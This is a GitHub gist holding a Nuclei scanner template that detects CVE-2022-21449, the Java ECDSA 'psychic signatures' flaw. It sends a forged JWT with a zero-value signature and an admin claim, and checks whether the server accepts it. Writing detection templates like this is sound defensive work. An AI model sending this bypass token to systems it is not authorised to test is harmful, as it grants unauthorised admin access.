-
-
Save emadshanab/a35850d66b3cee2ea04c969555d8afe0 to your computer and use it in GitHub Desktop.
Nuclei template to detect exposure to CVE-2022-21449 by the JWT validation API in place.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: CVE-2022-21449 | |
| info: | |
| name: CVE-2022-21449 test exposure | |
| description: The JDK 15-18 have a vulnerability in validation of ECDSA signature so this template detect exposure to CVE-2022-21449 by the JWT validation API in place. | |
| author: righettod | |
| severity: info | |
| tags: cve,2022,java | |
| reference: https://neilmadden.blog/2022/04/19/psychic-signatures-in-java | |
| requests: | |
| - raw: | |
| - | | |
| GET /?id={{randstr}} HTTP/1.1 | |
| Host: {{Hostname}} | |
| Cache-Control: no-store | |
| - | | |
| GET /?id={{randstr}} HTTP/1.1 | |
| Host: {{Hostname}} | |
| Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJSaWNrIEFzdGxleSIsImFkbWluIjp0cnVlLCJpYXQiOjE2NTA0NjY1MDIsImV4cCI6MTkwMDQ3MDEwMn0.MAYCAQACAQA | |
| Cache-Control: no-store | |
| req-condition: true | |
| matchers: | |
| - type: dsl | |
| dsl: | |
| - '(status_code_1 == 403 || status_code_1 == 401) && status_code_2 == 200' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment